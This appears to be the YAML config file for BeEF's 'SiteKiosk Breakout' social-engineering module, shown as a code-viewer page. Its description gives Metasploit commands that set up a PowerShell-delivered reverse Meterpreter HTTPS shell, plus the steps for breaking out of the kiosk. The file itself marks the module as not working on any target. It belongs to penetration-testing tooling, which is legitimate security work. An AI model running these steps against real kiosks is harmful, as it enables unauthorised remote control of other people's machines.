Path: blob/master/modules/social_engineering/sitekiosk_breakout/config.yaml
1154 views
#1# Copyright (c) 2006-2025 Wade Alcorn - [email protected]2# Browser Exploitation Framework (BeEF) - https://beefproject.com3# See the file 'doc/COPYING' for copying permission4#5beef:6module:7sitekiosk_breakout:8enable: true9category: ["Social Engineering"]10name: "SiteKiosk Breakout"11description: "This Module breaks out of SiteKiosk by using HTA. The HTA closes the kiosk and starts a reverse meterpreter shell via a powershell payload!<br>Before launching the module, do the following on Metasploit:<br>use exploit/windows/misc/psh_web_delivery<br>set URIPATH /psh<br>set PAYLOAD windows/meterpreter/reverse_https<br>set LHOST x.x.x.x<br>set LPORT 443<br>set ExitOnSession false<br>set AutoRunScript post/windows/manage/smart_migrate<br>exploit -j -z<br><br>After executing the module, follow this steps:<br>Click Save<br>Enter shell:ProgramFiles in the Save Dialogs adressbar<br>Navigate to C:\\Users\\Public\\Downloads<br>Save the file<br>After the Download is finished click on execute<br>Profit"12authors: ["insertscript"]13target:14user_notify: ["IE"]15not_working: ["ALL"]161718